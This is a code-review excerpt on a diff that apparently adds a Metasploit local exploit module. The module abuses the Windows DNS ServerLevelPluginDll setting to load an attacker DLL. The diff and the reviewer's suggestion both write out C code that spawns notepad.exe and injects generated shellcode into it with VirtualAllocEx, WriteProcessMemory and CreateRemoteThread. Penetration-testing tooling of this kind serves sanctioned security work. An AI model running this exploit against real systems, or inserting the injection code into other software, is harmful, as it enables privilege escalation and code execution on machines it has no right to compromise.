modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb

```diff
@@ -0,0 +1,315 @@
+    #    the target falls back to SMB1
+    dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
+    if datastore['DLLPATH'].start_with?("\\\\")
+      # check if "Enable insecure guest logons" is enabled on the target system
+      allow_insecure_guest_auth = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters", "AllowInsecureGuestAuth")
+      if allow_insecure_guest_auth == 1
+        fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
+      end
+
+      print_status("Using user-provided UNC path.")
+    else
+      # generate the payload
+      payload = generate_payload
+      # the C template for the ServerLevelPluginDll DLL
+      c_template = %|
+          #include <Windows.h>
+          #include <stdlib.h>
+          #include <String.h>
+
+          BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
+              switch (dwReason) {
+                  case DLL_PROCESS_ATTACH:
+                  case DLL_THREAD_ATTACH:
+                  case DLL_THREAD_DETACH:
+                  case DLL_PROCESS_DETACH:
+                      break;
+              }
+
+              return TRUE;
+          }
+
+          int DnsPluginCleanup __attribute__((export))(void) { return 0; }
+          int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; }
+          int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) {
+              STARTUPINFO startup_info;
+              PROCESS_INFORMATION process_info;
+              char throwaway_buffer[8];
+
+              ZeroMemory(&startup_info, sizeof(startup_info));
+              startup_info.cb = sizeof(STARTUPINFO);
+              startup_info.dwFlags = STARTF_USESHOWWINDOW;
+              startup_info.wShowWindow = 0;
+
+              if (CreateProcess(NULL, "C:\\\\Windows\\\\System32\\\\notepad.exe", NULL, NULL, FALSE, 0, NULL, NULL, &startup_info, &process_info)) {
+                  HANDLE processHandle;
+                  HANDLE remoteThread;
+                  PVOID remoteBuffer;
+
+                  unsigned char shellcode[] = "\xaa\xbb\xcc\xdd";
+
+                  processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId);
+                  remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE);
+                  WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
+                  remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
+
+                  CloseHandle(process_info.hThread);
+                  CloseHandle(processHandle);
+              }
+
+          return 0;
+        }
+      |
+
+      c_template.gsub!("\xaa\xbb\xcc\xdd", Rex::Text.to_hex(payload.raw).to_s)
```

Comment:
Suggest using a more readable placeholder:

```suggestion
                  unsigned char shellcode[] = "SHELLCODE_PLACEHOLDER";

                  processHandle = OpenProcess(0x1F0FFF, FALSE, process_info.dwProcessId);
                  remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, 0x3000, PAGE_EXECUTE_READWRITE);
                  WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
                  remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);

                  CloseHandle(process_info.hThread);
                  CloseHandle(processHandle);
              }

          return 0;
        }
      |

      c_template.gsub!('SHELLCODE_PLACEHOLDER', Rex::Text.to_hex(payload.raw).to_s)
```